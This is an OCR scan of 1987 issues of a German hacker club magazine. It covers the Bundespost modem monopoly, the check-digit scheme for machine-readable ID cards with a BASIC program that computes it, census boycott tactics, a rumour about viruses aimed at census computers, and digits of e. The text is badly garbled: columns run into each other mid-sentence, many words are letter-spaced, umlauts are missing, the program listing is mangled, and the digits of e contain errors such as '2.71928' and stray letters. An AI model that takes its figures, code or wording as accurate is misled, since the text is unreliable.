Untersuchungsbericht des Hambur- Felder" ausgefllt werden, wenn sowie Diskussionen ber die Zukunft gischen Datenschutzbeauftragten in .entsprechende persnliche Daten des Vereines, bis in die Nacht. der Hackerbibel Teil II zum ende vorliegen: Geburtsnams, Postarostbedieses Jahres abdrucken. Ende. reieh, Wohnung, Hausnummer, Ordens- Sonntag 19. April - ab 12 Uhr Eine zweite "Hackermeldung* findet name/Knstlername. Fehlen diese weiter-fhrung der Workshops des sich im Bericht des Berliner Daten bleiben die Felder leer. Bei virenForums bis circa 16 Uhr DatenSchtzers nur eine Leerzeile diesem ganzen Ausfllen werden die anschliessend Aufrumen und bergabe der Humlichkeiten - folgend Zeit tiefer. Ausnahmeflle in der Schreibweise deiD_im letzten. Jahresbericht (Akzente und Sonderzeichen) geson- fr private Gesprche. erwhriten Fall eines Berliner Teil- d e r t behandelt und verarbeitet nehmers, unter dessen Teilnehmer- D i e "Seriennummer" hat eine Lnge Mitglieder des CCCeV, die ihre Beikennung ein Dritter gebuhrenpflieh- v o n _ i q Ziffern. Vier Ziffern sind trge bezahlt haben, brauchen sich tige Seiten aufgerufen hatte, weil fr die Behrdenkennzahl, weitere" nicht anzumelden und zahlen auch er sich dem System gegenber als fnf die laufende Nummer und eine keine TeilnahmegebUhr - von allen freizgig (sowas wie ein blinder Ziffer als PrfZiffer. Die Prfzif- anderen wird erwartet, da sie Portier, d.Red.) deklariert hatte fer wird wie folgt berechnet: Mul- DW 10,- auf unser Poatgirokonto und unbedachter Umgang mit dem tiplizieren jeder Ziffer der Behr- (599090-201, Postgiros Hamburg, Kennwort nicht auszuschliessen war, denkennzahl und der laufenden Num- BLZ 20010020) unter dem Stichwort haben die staatsanwaltschaftlichen m er, beginnend mit der ersten Zif- "FORUM" zur Anmeldung bis zian Ermittlungen anhand der berprfung fer, mit den Faktoren 731731731 auf 15. April einzahlen und den Beleg der Protokolle ber die Systemnut- der Basis von Kodul 10 (1. Ziffer mitbringen. Gebt bitte Eure Telefonzung ergeben, da der unbefugte mal 7, zweite mal 3, usw). Dann numer an, damit eventuell vorbereiZugriff unter falscher Kennung ber Addieren der neun Einzelprodukte, tend Gesprche gefhrt werden knnen. ein Terminal erfolgte, welches ia Dividieren der Summe durch 10. Bereich einer Ferasprechentst- Verbleibt bei der Division ein Der CCC hofft auf eine ruhige, nicht rungsstelle der Oeutschen Bundes- Rest, so ist dieser die Prfzifferj zu chaotische Veranstaltung. post in Berlin aufgestellt war. Die verbelibt kein Rest, so lautet die bemachtungspltze sollten privat Identitt des Tters selbst konnte Prfziffer 0. besorgt werden, sonst kann auf die jedoch bisKer nicht ermittelt wer- Dann werden die Antrge, bis zu 10 Jugendherberge (Stintfang) zurckge-* den." Stck, in einer Kunstoffhlle ver- griffen werden. Verpflegung ist nicht Dieses ist nicht der einzige uns sandt. Der fertige Ausweis kann geplant (Ausnahme Kaffee). Bringt bekannte Fall, bei dem Postlern dann wenige Tage spater unter- gute Laune mit, und sollten noch Fragen unbeantwortet sein, ruft (und nur solche haben zu bestimmten schrieben und abgeholt werden. Rumen und Informationen Zutritt) Frankreich hat sich im Gegensatz Steffen unter 040-483752 oder die ein grob fahrlssiger, j sogar zur Bundesrepublick, gegen die Ein- CCC Geschftsstelle unter teilweise krimineller Weise, Umgang fhrung eines maschinenlesbaren 040-4903757 an. mit vertraulichen Informationen Ausweises entschieden. Demokra(Zugangsberechtigungen, Manipula- tische Systeme bentigen einen tionsmglichkeiten) nachzuweisen Freiraum, der Wiedertstand gegen ist. Die Redaktion erbittet Hin- faschistische Tendenzen noch ermgweise von den Lesern um in dieser licht. Aber wir Deutschen waren ja LS 2 3 Po^t,txt Sache weitere Recherchen anzustel- schon immer etwas grndlicher. Die LS23 - Ausweis.txt lan. Es stellt sich die Frage, ob Folgen dieser effektiven KontrollLS23 - Ostern.txt die Bundespost berhaupt ein mglichkeit werden wir in wenigen B e w u t s e i n um den Datenschutz hat? Monaten zu spren bekommen.
s e in (

Kaum

D i e D B P erweckt d e n E i n d r u c k , ihre M o n o p o l s t e l lung wre aufgehoben. D i e Deutsche Bundespost entwickelte geschickt eine Intrige a u f d e m Schlachtf e l d d e s d e u t s c h e n M o d e m m a r k t e s . Bis E n d e 1986 durfte m a n nur M o d e m s der D B P am ffentlichen F e r n s p r e c h n e t z b e t r e i b e n , j e d o c h i m Bereich d e r int e r n a t i o n a l e n M i e t l e i t u n g e n g e w h r t e sie d e n B e t r i e b von teilnehmereigenen M o d e m s , soweit diese b e r e i n e a l l g e m e i n e F T Z - Z u l a s s u n g (jetzt Z Z F - Z u l . ) verfgten. D i e deutschen M o d e m a n w e n d e r ertrugen diese Last m i t t r a u e r n d e m Blick a u f d i e Marktliberalisierung der europischen Nachbarstaaten u n d in d e n U S A . D e r E G fiel s c h o n f r h d i e s e M a r k t v e r z e r r u n g d e r D B P , z u g u n s t e n ihres M o n o p o l s ins A u g e , u n d sie b e r i e f e i n e B r s s l e r E G - K o m m i s i o n e i n , u m sich n h e r m i t d i e s e m P h n o m e n z u b e f a s s e n . Unter d e m stndigem D r u c k der E G - K o m m i s s i o n u n d bedroht v o n einem Gerichtsverfahren konterte die D B P mit einem K o m p r o m i v o r s c h l a g , der eine L i b e r a l i s i e r u n g d e s M o d e m m a r k t e s i n A u s s i c h t stellte. D e r P o s t v e r w a l t u n g s r a t l e h n t e a l l e r d i n g s d i e s e n V o r s c h l a g a m 30. J u n i 1986 m i t d e r B e g r n d u n g a b , es sei n i c h t e i n d e u t i g g e k l r t , i n w e l c h e r W e i s e d i e E G E i n f l u a u f die Postpolitik n e h m e n drfte. Dies ist v e r s t n d l i c h : d e r P o s t v e r w a l t u n g s r a t setzt s i c h a u s Vertretern d e r I n d u s t r i e z u s a m m e n , d i e w i e z . B . Siem e n s als H o f l i e f e r a n t d e r D B P u m i h r M o d e m - M o n o p o l f r c h t e n . D a s B u n d e s k a b i n e t t b e r s t i m m t e jed o c h a m 16. J u l i 1986 d e n P o s t v e r w a l t u n g s r a t u n d ebnete somit d e n W e g fr d i e 30. nderungsverordn u n g z u r F e r n m e l d e o r d n u n g ( 3 0 . n d V F O ) . D i e s e ist n u n s e i t d e m 1. D e z e m b e r 1986 r e c h t s k r f t i g . N a c h d e r 30. n d V F O e r m g l i c h t d i e D B P d e n E i n satz v o n p r i v a t e n u n d v o r a l l e n D i n g e n t e i l n e h m e r e i g e n e n M o d e m ' s . d i e , u n d h i e r i n liegt d e r H a k e n , weit e r h i n a n d i e a l l g e m e i n e F T Z - Z u l a s s u n g ( = Z Z F ) geb u n d e n sind. Als w a h r e T u s c h u n g e n e n t p u p p e n sich diese k l u g f o r m u l i e r t e n F a c h s p e z i f i k a t i o n e n d e r 30. n d V F O : E s existieren vorerst ( b i s E n d e 1987?) n o c h g a r k e i n e ! S o d r f e n baugleiche M o d e m s v o n Herstellern, die f r d i e Post p r o d u z i e r e n , n i c h t a m f f e n t l i c h e n Ferns p r e c h n e t z eingesetzt w e r d e n , d a d i e Z u l a s s u n g m a n gels V o r s c h r i f t e n n i c h t e r f o l g e n k a n n . Der M a r k t staunt hingegen, mit welcher K h n h e i t d i e D B P n o c h rechtzeitig z u r C e B i t '87 d i e Z u l a s s u n g s b e d i n g u n g e n f r e i n e d e r S t e i n z e i t in d e r D a t e n k o m m u n i k a t i o n entsprechende bertragungsnorm, der V26bis a n k n d i g t . U n t e r die V26bis N o r m fallen alle M o d e m s , d i e d e r G c s c h w i n d i g k e i t s k l a s s e v o n 2400 u n d 1200 B a u d m i t H i l s k a n a l a n g e h r e n . D i e s e N o r m ist m i t t l e r w e i l e V e r g a n g e n h e i t . D i e D B P argumentiert zwar i m m e r n o c h mit d e m Einsatz der V26bis b e i B T X als S t a n d a r d , j e d o c h a b e r z e u g t e i n k u r z e r B l i c k i n d i e U S A v o m G e g e n t e i l . D o r t w i r d bereits seit r u n d z w e i J a h r e n m i t 2 4 0 0 B a u d v o l l d u p l e x b e r das konventionelle 2-Draht Fernsprechnetz gehackt. D e r M a r k t w i r k t v l l i g irritiert u n d fragt s i c h , o b s c h o n w i e d e r d i e A b s i c h t d e r D B P besteht, e i n e n e u e T e c h n o l o g i e z u v e r s c h l a f e n b z w . w e l c h e G r n d e hinter d e m M o d e m - S p e k t a k e l s t e h e n .

G a n z b e h u t s a m w i r b t d i e D B P b e r e i t s f r ihre n e u e n 2400 B a u d 2- D r a h t V o l l d u p l e x M o d e m s v o n K a b e l m e t a l u n d S i e m e n s , d e r e n A b s a t z gesichert w e r d e n m u . H i e r liegt e i n e r d e r H a s e n i m P f e f f e r : D a s PostM o d e m D2400S nach C C I T T V22bis einschlielich automatischer W a h l e i n r i c h t u n g n a c h C C I T T V25bis kostet 5800.- D M ! W e m w u c h e r t es n i c h t , d e n n a u c h e i n e m o n a t l i c h e M i e t e w i r d mit 120.- D M recht t e u e r . F o l g l i c h v e r s u c h t d i e D B P m i t a l l e n T r i x d i e Privat a n b i e t e r z u s c h o c k e n . Z u m e i n e n v e r z g e r t sie d a s E r s c h e i n e n d e r Z u l a s s u n g s b e d i n g u n g e n , u m d e n eig e n e n A b s a t z z u s i c h e r n m i t d e r B e g r n d u n g , erst eine E G - w e i t e E i n i g u n g e r r e i c h e n z u w o l l e n . Z u m a n d e r e n w i r d d e m A n w e n d e r e i n e S c h i k a n e aufged r c k t i n F o r m e i n e r m o n a t l i c h e n Prf- u n d M e g e b h r v o n bis z u 25.- D M bei E i n s a t z v o n p r i v a t e n M o d e m s . A l s b e s o n d e r e K r n u n g b e d a n k t sich d i e D B P n o c h z u g u t e r letzt m i t d e m g e f r c h t e t e n G e bhrenhorroram PATTEX-D Zugang. Vorerst w i r d es also n i c h t s a u s d e m d u r c h d i e 30. n d V F O g a r a n t i e r t e n freien M o d e m m a r k t . S. S t a h l

Mohr als 20 See. ) auf Hchststufe ... J

B G B : Das meistgeklaute Buch


( d s n d r ) W i e e i n e U n t e r s u c h u n g f f e n t l i c h e r Biblioth e k e n e r g a b , steht j u r i s t i s c h e L i t e r a t u r u n d d a b e i d a s Brgerliche Gesetzbuch an der Spitze entwendeter Bcher. w a u

IMPRESSUM

DIE DATENSCHLEUDER Nr.19, 31.4.87 Das wissenschaftliche Fachblatt fr Datenreisende. Schwenckestrae 85 D-2000 Hamburg 20. GeoNet: Geol: Chaos-Team BTX-Leitseite: *655321 * # Herausgeber und V.S.0.P.: Herward Holland-Moritz. Mitarbeiter (u.a.): marina kern, R-Schrutzki, S.Wernery, A.Eichler, P.Franck, M.Kuehn, Andy M.-M., KS, Jwi, DDT, Carsten, Poetronic, TL. Vierfarb-Kartoffelhochdruck im Selbstverlach. DS Seite 15

DS Seite 14

Die Datenschleuder

1987
D i a D a c s n s c h l a u d e r i g >
7

Postvertriebsstck C9927F

P o a t v e r c c l a b a a t U c k

C 9 9 2 7 F

D M 3,00

N u m m e r 20

Wenn u n z u s t e l l b a r Anschriftenausschnitt bitte mit neuer Adresse zurck

te

SaienMjIcubcr - f

Das wissenschaftliche Fachblatt fr Datenreise Ein Organ des Chaos Computer Club JAM
y. jjt Jf y. Festplatten Laufwerke Compiler ST-Sofware

S FT
In eigener Sache;
1) Schickt uns keine EINSCHREIBEN, die knnen nmlich bis auf weiteres nicht angenommen werden (Hab keinen Perso in dem ich Chaos Computer Club heie). 2) Das in der DS18 angebotene Paket zur Volkszhlung ist nun wiederwrtigerweise doch nicht lieferbar, da uns die Vertriebsrechte von der Autorin nicRt erteilt worden sind. Eingegangenen Bestellungen werden irgendwie erstattet. 3) Zur Zeit sind auch die Aufkleber "Kabelsalat" und "Achtung Abhrgefahr" nicht lieferbar. Vorliegende Bestellungen werden auf Halde gelegt oder in Briefmarken erstattet. 4)'Bitte schickt uns keine Briefmarken in 5Pf Werten mehr. Am hufigsten brauchen wir 80Pf, aber auch 50, 20 und selten 10Pf werden bentigt. 5) Kurze Briefe die sich mit ein paar Stzen beantworten lassen (oder mit einer ProbeDS) werden schnellstens Bearbeitet. Lngere Anfragen bitte am einfachsten
.y. M o d e m s .y. Akustikkoppler j f Kommunikations Software

e
Die Zahl
2.71928 66249 62772 5251 6 B1741 59563 B29B3 93070 7 6 1 46 74234 5 5 1 70 75204 70932 2093 1 46377 77078 93163 42499 66803 93923 30123 32068 78250 06981 59338 87922 484 19 62432 30436 64054 7633? 30310 17 189 95703 06817 74501 32823 98194 12509 85193 84998 84443 70419 99418 62531 64243 72085 36106 50354 01210 59539

Endlich. Die Genauigkeitsfanatiker haben lange auf diese Sensation gewartet. Natrlich verffentlichen wir e, die natrlichste aller natrlichen Zahlen, auf 10.000 (in Worten: zehntausend) Stellen hinter dem Komma, und zwar als Fortsetzungsgeschichte. Hier nun die erste Folge der Zahl e, die nach 337.61 Sekunden aus einem ATARI 520 ausgeworfen wurde:
23536 02374 95749 69995 54759 45713 39193 20030 57290 03342 62794 01901 93488 80016 53907 26133 29760 74704 81902 78442 94686 79312 48220 39849 32036 14039 80429 30175 89159 27386 80582 24496 20900 31409 19369 59271 75051 96552 40784 88023 41995 34907 1 5738 41675 84774 77449 1 3845 67371 72306 55151 50569 44549 7736 1 82698 64651 25094 70198 53118 67173 3 0 4 16 67385 57492 84875 21609 3431 7 08337 45635 01157 1 2671 93193 51930 77770 71352 66967 82178 5992 1 95260 6 323 o 34197 09244 1 1853 92069 0.3000 13200 96977 03657 53696 85987 7 8 2 15 95193 05820 43117 37679 02328 61332 90351 39422 796 10 60233 90235 33143 07016 49061 47704 54688 34321 33224 93503 74272 44235 24796 01612 64832 01910 72530 69829 34754 49679 93546 33405 16674 45203 38386 88623 03494 77275 06275 05953 92966 03136 28123 72115 15219 82947 64829 98197 44182 30899 8324 1 52795 34447 78443 63620 03117 28364 29486 35743 54922 62779 59004 27786 46959 63'64 12874 67757 39220 00169 04024 38744 42818 65014 47109 26023 41166 69331 02057 14765 55194 60037 37610 22443 13991 32625 70388 25611 46618 40160 71436 02353 34392 89613 42251 36372 14174 70263 75529 78509 25770 33386 56648 91644 99828 3 1 3 6 4 15519 30801 91529 47910 1 4590 06870 50489 5 7 3 2 0 563 1 2 00113 78630 84205 53040 32256 61352 39662 53224 99707 73327 34558 39707 62953 74152 26484 72870 12054 52970 15137 32275 24817 65351 50704 75102 36635 08003 35625 27944 85263 98139 75287 18462 4 7 5 6 4 4882,6 15097 48279 86778 55096 227 1 3 90717 66394 66613 64450 02383 44483 25620 16277 93150 56532 872 1 1 40905 53586 38459 09455 33637 73369 98506 61717 19425 11151 39207 30236 36450 18063 54465 69532 95158 55990 45780 26039 07779 83605 65070 56647 80717 70959 69652 03293 73182 934 4 1 37998 92622 25164 56604 44258 72556 86298 71747 2054 1 60688 95376 51177 54995 83923 86398 36835 64310 47254 98889 03644 01172 28133 284 18 06737 36192 03381 96437 77297 63304 0971 1 48187 10259 20005 63447

18284 5 9 0 4 5 77572 47093 40766 30353 64274 27466 35966 29043 32328 95251 89149 82264 37107 .38606 26560 27443 92836 52389 69967

telefonisch ber den Club (040/4903757) oder in ganz dringenden Fllen bei mir Privat (MoFr. 10-23 Sa-So 12-23 unter 040/3193604). Das sind KEIME Mailboxen und wer sich nicht an die angegebenen Zeiten hlt der wird ohne Antwort auf seine Fragen bleiben. DAS IST BIERERNST!!!!! 6) Wenn ihr was von uns schriftlich wollt, dann legt doch am besten (fr uns) eine ausreichend frankierten und korrekt adressierten A5-Umschlag bei. Was ihr fr unsere Portokasse haltet ist nmlich mein privates Portmonaie, und das ist leer! 7) Und noch was, schreibt bitte wenigstens eure Adresse leserlich (ich bin KEIN Cryptologe) und unsere Antworten kommen dann auch bei euch an. 8) Frankiert bitte ausreichend, ich mag kein Nachporto, ihr doch auch nicht, oder? So das wars, was mir auf der Seele brannte.
MFG MRKU

07381 07531 21540 06680 54424 2 7 6 18 49338 87091 01416 21112 54499

68892 30098 92295 76351 31825 28869 98294 88793 81970 68416 76464 55815 96181 45307 92086 63463 78623 49146 52096 78140 10333 87396 02123 05627 04730

70462 62156 93821 35596 71358 37435 07321 1390S

041 9973 29725 08SS 76966 40355 57071 2268 44716 25607 98826 51787
13419 43252 TSSS11) 51246 65201 78675 3985S
I 3 5 b 1

DS Seite 16

03059 89443
7

21236 96970

b1\

677 1 9 96409
1 7

96690

97273 55955 27734 9071 7 83793 42163 70120 50054 51326 i38354 40001 36323 99149 0 7 0 5 4 7 9 7 7 3 135669 73533 58048
62951 19452 47309 9587055236
n (7,

Maschinenlesebarer Ausweis b 1 .April mssen die autometengerechten Per- einer laufenden Zhlnummer, die 10. Stelle Ist sos beantragt werden. Zur besseren maschi- eine Prfsumme, um Lesefehler zu erkennen nellen Brgerverarbeitung ist jetzt der Erts- oder gar zu beheben. Hier das Prfsummenwohnsitz in den ersten vier Stellen der Se- Rechenprogramm: riennummer verdatet, Stelle 5 bis 9 entspricht
Prgniname$= "BPAPRF1" . Erstellt anhand eines Dokumentes der Dundesdruckorei ' VersionS="$V 1.01" ! "MERKBLATT Euer Personalauswe isbehoerden" Stamp$="198703271654"! 5.4 Detailvorschriften Copyright$="wau" ! Regeln Euer das Errechnen der Pruefziffer Seriennummerlaenge-9 ! Stelle 1..4: Behoerdenkennzahl, 5..9: lfde. Nr. 1 Diese Standardisierung automatisiert Zugriff ueber Behoerde am Hauptwohnort Dim Produkt(Seriennummerlaenge) Seriennummer5="270752123" ! Test-Musternummer, deren Pruefziffer 7 ist FaktorschluesselS="731731731" ! Faktorenfolge zur Pruefziffernberechnung Fehler=False ! kein Fehler bei der Eingabe Print "BundesPersonalAusweisPruefziffernberechnung " Print "Programm ";Prgmname$;" Version "Version!;" Datumzeitgruppe: ";StaiupS Do ! Ewige Schleife Input "Maschinenlesbare Auswe isnummer ohne Pruefziffer: 11, Ser iennumme r S Exit If Len(Seriennummer$)=0 ! Abbruchbedingung Leereingabe Gosub Eingabepruefung if Not Fehler Gosub Errechne_pruefZiffer Print "Gefundene Pruefziffer ist: "; Prue f z i t er ' End i f Loop End Procedure Eingabepruefung If L e n ( S e r l e n n u m m e r S ) O S e i i e n n u m m e r l a e n g e ! Eingabepruefung Laenge Print "Fehler - falsche Seriennummernlaenge! (Abbruch mit Leereingabe)" Print Seriennummer$ Fehler=True' Endif For 1-1 To Serlennummerlaenge ! Eingabepruefung Ziffern I Midi(Ser iennummer5,1,1)<"0" Or Mid$(Seriennummer$,1,1)>"9" Print "Fehler - andere Eingabe als Ziffer! (Abbruch mit L e e r e 1 n g u b e ) " Fehler=True Endif Next I Return Procedure Errechne_prueziffer ! Die folgenden "Zitate" aus o.a. DKument. ' "Die Endziffer der Seriennummer ist die Pruet'zltfer, die auf der ' Basis von Modul 10" (richtig: "modulo 10") wie folgt errechnet wird:" G o s u b Stufel ! "Multiplizieren jeder Ziffer der Behoerdenkennzahl und der laufenden N u m m e r , beginnend mit der ersten Ziffer der Behoerdenkennzahl ' mit den F a k t o r e n 731731731" Gosub Stufe2 ! "Addieren der Einzelprodukta" Gosub Stufe3 ! "Dividieren der Summe durch 10 (Modul)" Gosub Stufe4 ! "Verbleibt bei dieser Division ein Rest, so ist dieser die Feturn ! Pruefziffer, verbleibt kein Rest, so lautet die Pruefziffer 0." Procedure Stufel ! Ziffernweise Multiplikation Ser iennummer*Behoerdenkenrizahl For 1=1 To Serlennummerlaenge Produkt (I )=Val(MidS (SeriennummerS, 1,1) ) *Va 1 (MidS (Sehl uessel fak tor $, 1,1)) Next I Return , Procedure Stufe2 ! Addieren der Einzelprodukte Summe=0 For 1=1 To Seriennummerlaenge Add S u m m e , P r o d u k t ( I ) Next I Return Procedure Stue3 ! Dividiere die Summe durch 10 ohne Rest Zehntel_ohne_rest=Int(Summe/10) Return Procedure Stufe4 ! Pruefziffer ist der bei der Division verbleibende pruef z i f fer = Sunune-Zehnte l_ohne_rest*10 Return Rest

Praktischer Datenschutz
ds-Red. Hamburgs Volkszhlungsinitiativen haben am 20. Mrz ihr Konzept zur endgltigen Verhinderung der,geplanten staatlichen totalen Erfassung bekanntgegeben. Danach soll es zumindest in Hamburg ausschlielich einen "harten" Boykott" geben. Von verdeckten "weichen" Widerstandsformen raten die Initiativen wegen der rechtlichen Konsequenzen fr den einzelnen ab. Die Volkszhlungsinitiativen empfehlen ein Dreiphasenkonzept anllich der geplanten Volkszhmung '87": 1. Annahme des Bogens an der Haustr und Mitteilung, da er dem Statischen Landesamt zurckgeschickt wird ("Jaja, keine Zeit jetzt"). 2. Eigenhndige Anonymisierung durch Umgestaltung der Ordnungsnummer zum Chaosloch im Volkszhmungsbogen mit scherenartigen Werkzeugen. 3. Weiterleitung der so anomynisierten Unterlagen an die nachbarschaftlichen Initiativen oder VoBoSammetstellen. Der dritte Punkt dient der Information der ffentlichkeit ber die Breite des Widerstandes in anonymisierter Form. Adressen und Treffs rtlicher Initiativen knnen, wie bei der letzten verhinderten Zhmung, u. a. ber Stadtzeitungen und - teilweise - ber Datenschutzbeauftragte und Parteien erfragt werden. Angesichts der vielen Werbemillionen fr die IndulaNeuverdatung fordern Sptter anstelle der Volkszhmung mit ihren Werbemillionenmark die allgemeine Volkszahlung '87 dieser Millionen und werfen Zhlungsfan Heino ("deutscher Snger fr deutsche Zhlung") vor, er htte nur Angst, versehentlich im polizeilichen Fahndungsraster mit einem von ihm beklagten Doppelgnger von den Toten Hosen verwechselt zu werden. Gloria von Thurn und Taxis, durch Familientradition dem Reichspostregal und so der Einfhrung der Datenweitergabe an die Hoheit (werschreibt wann wem. gegebenenfalls was?) verbunden, wird im Spiegel zum Thema zitiert mit "Kriminelle Elemente besser erfassen". Der S P I E G E L zitiert als CCC-Ratschlge ein weiches Boykottkonzept; ein anderswo verdrucktes Zitat, das die Meinung im Chaos Computer Club nur sehr verkrzt wiedergibt. wau

6 VAX Pistols GOD SAVE THE PIN 7 Think Floyd DARK SIDE OF THE CPU 8 Simon & Furunkel BIT OVER TROUBLED DATA 9 Tina Turner NETWORK CITY LIMIT A Low Read WALK ON THE FILE SIDE
53537 13722 18692 43961 72990 14771 06064 56420 91704 43490 50881 08761 36187 55386 29460 85731 16396 58459 97526 19777 76964 47792 38939 89365 06164 35291 58029 33709 25126 85082 80085 23722 23151 63917 26053 77983 33259 09586 24003 99465 30754 36273 29435 97477 79574 81558 40254 42794 31382 16894 57248 42545 09417 23661 30605 54016 41587 35128 90433 68329 58636 39186 99376 10163 25572 69672

Informationelle Selbstbestimmung leichtgemacht


(Hamburg,CRD) Seltsames widerfuhr einem Aktivisten, der beim Hamburgischen Statistischen Landesamt um Informationsmaterial zur Volkszhmung nachsuchte. Als er das gwnschte Material nebst Trdrcker schon in der Hand hielt, wurde er von der HaStaLA - Dame zwecks Adressabgabe zurckbeordert. Als unser Protagonist nach erfolgter Datenabgabe bemerkte, da seine Daten auf einen Stapel gleichartiger Formulare gepackt wurden, fragte er sicherheitshalber nach dem Verwendungszweck und erhielt den lakonischen Bescheid, der Rechnungshofe verlange diese Angaben. Angesichts der UnWahrscheinlichkeit dieser Aussage und des geringen Wertes der erhaltenen Infos, auch in materieller Hinsicht, wurde der Datenerfassungsbeleg in Privatbesitz zurckgefhrt, was zu heftigem Protest der Dame und Herbeiruf eines Vorgesetzen derselben fhrte. Dieser bezog sich ebenfalls auf den Rechnungshof und verlangte entweder den DEB oder das Infomaterial zurck, beides wurde verweigert und der Beleg sicherheitshalber zerrissen in die Jackentasche versenkt. Aber selbst derart verstmmelte Daten wecken das Interesse eines Statistikers, und das Angebot des Vorgesetzten, man knne die Fetzen gerne im amtseigenen Papierkorb endlagern, erschien wie die vergeblichen Versuche eines Vampirs, an die letzte unverseuchte Blutkonserve zu gelangen. Nachdem es schliesslich gelungen war. mit dem Informationsmaterial und ohne Zurcklassung personenbezogener Daten das HaStaLA zu verlassen, besttigte ein Kontrollanruf beim Rechnungshof die Handlungsweise: Dort wusste man nmlich nichts von eine derartigen Anweisung. Bis zur Stunde konnte nicht zweifelsfrei geklrt werden, wozu die Daten nun wirklich bentigt werden. gobiin
splittl9.doc 198703201750 g 27.15:30 wau

Formel NullEins: Die Hacker-Charts 1 The Bitles YELLOW SUBROUTINE 2 John TraVolt EVERY NIGHT FEVER 3 Elvis Presley IN THE GOTO 4 Talking Heads STOP SENDING SENF 5 Scrolling Stones GIMME PASSWORD

>ate*i d&teuber

Volkszhmung Kein Datenschutzkonzept - Hacker wollen Volkszhlungssottware testen Hamburg - Sogenannte Virenprogramme, die sich automatisch in Computersystemen vervielfltigen und dort Datenbestnde und Programme verndern und zerstren knnen, standen im Mittelpunkt des letzten Hackerkongresses (CCC) in Hamburg. Seitdem kursiert das Gercht, Hacker wollten solche Computerviren in die Rechenzentren der statistischen Landesmter einschleusen und damit die Auswertung der Volkszhlungsdaten lahmlegen. Doch solchen Vorhaben fehlt bis auf weiteres die Grundlage, so jedenfalls war aus der bayrischen Hackerszene zu erfahren. Bislang lge den verantwortlichen Rechenzentren noch kein funktionsfhiges Auswertungsprogramm vor. Das Statistische Bundesamt hat fr Hertest diesen Jahres lediglich den Entwurf eines Datenverarbeitungskonzeptes angekndigt. Fachleute vermuten, ein den Anforderungen gengendes Computerprogramm werde es als Rohversion frhestens im Frhjahr 1988 geben. "Ohne fertige Software", so Thomas Vogler von der Bayrischen Hackerpost (B.H.P.), "macht der Einsatz von Viren nicht allzuviel Sinn."

Jetzt wollen sich die Bayern der Volkszhlung widmen. Nach der Devise "Konkurrenz belebt das Geschft", haben sie Anfang April die bundesdeutsche Hackerszene zu einem Wettstreit mit den Entwicklern der Volkszhlungssoftware aufgerufen. Die Grundlage bilden neben einer gewissen Anzahl per Computer zusammengestellter Pseudo-Bundesbrger freiwillig abgegebene Daten die nach dem gleichem Raster wie das der Volkszhlung 1987 erhoben wurden. Fr den Umgang mit diesen Daten haben sich die Akteure notarieller Aufsicht unterstellt. Erklrtes Ziel: Nach allen Regeln der Kunst soll aus den Daten "rausgeholt werden, was rauszuholen ist". Mit Rckgriff auf ffentlich zugnglichen Daten soll ein mglichst vollstndiges Persnlichkeitsabbild des Menschen im Rechner enstehen. Ob dies gelingt, bleibt dahingestellt. Auf alle Flle rechnet das "Bayrische Forum Mensch und Computere.V."damit, da durch diese Aktion Sicherheitsfragen zutage gefrdert werden, die in bisherigen Datenschutzkonzepten nicht bercksichtigt wurden. Am 25.April, also einen Monat vordem Stichtag der offiziellen Volkszhlung, wollen die 'lebensbejahenden DF - Benutzer'von der BHP mit ihrer "Aktion Kontrollzhlung" beginnen. Gegen Rckporto versendet das "Bayrische Forum Mensch und Computer e.V." durchnumerierte Erfassungsbgen, auf denen derselbe Datensatz abgefragt wird wie bei der "Volkszhlung 1987". Allerdings darf bei der Kontrollzhlung geschummelt werden, - aber nicht zu arg, wie Vogler warnt. "Auch wir fhren eine Plausibilittskontrolle durch und werden zeigen, wie gut das funktionieren kann". Unter Einhaltung der gesetzlichen Datenschutzbestimmungen, ber die ein Notar wacht, wollen die Bayern die Daten ihrer Kontrollzhlung eingeben und verarbeiten. Gegen Teilnahmegebhr wird Einblick in die persnliche Datenauswertung gewhrt. Da gesetzliche Regelungen den technischen Mglichkeiten immer um einige Jahre hinterhinken, wird von niemandem ernsthaft bestritten. "Doch was das bedeutet, glauben die Leute erst, wenn man es praktisch demonstriert", meint Vogler. Und genau das hat die Hackerszene vor.

Nachweis an, da mit relativ wenig Aufwand aus einer schier unberschaubaren Datenmenge Einzelpersonen herausgefiltert werden knnen. Maximal 10 von den insgesamt 33 Einzeldaten aus der"Volkszhlung 1987"seien dazu notwendig. Die jederzeit mgliche Re-Identifizierung bereits anonymisierter Daten halten die Bayern jedoch fr ein vergleichsweise harmloses Problem. Weit ernster nimmt man die sich abzeichnende technische Mglichkeit, aus dem "persnlichen Datengerippe" jedes Einzelnen in Verbindung mit anderen Verwaltungsdaten allmhlich "individuelle" Persnlichkeitsbilder aufzubauen. "Nimmtman nurgengend andere Daten und Erkenntnisse zu Hilfe, kann letztlich ein vollstndiges elektronisches Gegenstck des einzelnen Menschen im Rechner simuliert werden", erklrt Vogler seine Bedenken. "Ein entsprechend programmiertes Expertensystem, gefttert mit Erkenntnissen etwa aus der Verhaltenspsychologie, knnte den Menschen scheinbar berechenbar machen." Wie dem auch sei. Jedenfalls wollen die Hacker der ffentlichkeit, im Gegensatz zu den statistischen Landesmtern, einen regelmigen Ttigkeitsbericht ber den Stand ihrer Softwareentwicklung prsentieren. Von der "Hacksicherheit" der Rechenzentren ist Vogler nicht berzeugt: "das Gesetz regelt die Vorgnge des Kopierens und Lschens so, als wren Magnetplattenspeicher und simple Aktenordner ein und dasselbe. Irgendwann kommt jemand an die Daten, fr den sie nicht bestimmt sind." Ob denn die Hackerszene die Volkszhlung boykottieren werde? "Jeder soll tun, was er fr richtig hlt - und wer sich zhlen lsst, gehrt registriert ", meint Vogler vieldeutig. Er selbst will den Erhebungsbogen ordnungsgem ausfllen, ihn allerdings bei einem Notar hinterlegen und mit dessen Beglaubigung eine einstweilige Verfgung erwirken. "Erst mchte ich geklrt sehen, ob ich angesichts der offensichtlichen gesetzgeberischen Flchtigkeitsfehler verpflichtet bin, den statistischen Amtern persnliche Daten zum Zwecke der Softwareentwicklung zu berlassen, ohne da geklrt wre, was sie programmieren drfen und was nicht." jwi volksza20.ds 198704161755
53801 53506 71507 5o058 7636S 73084 34424 42115 59278 29697 77646 52199

Auffllig ist bei uns das Unauffllige.

fHlllfjJIII

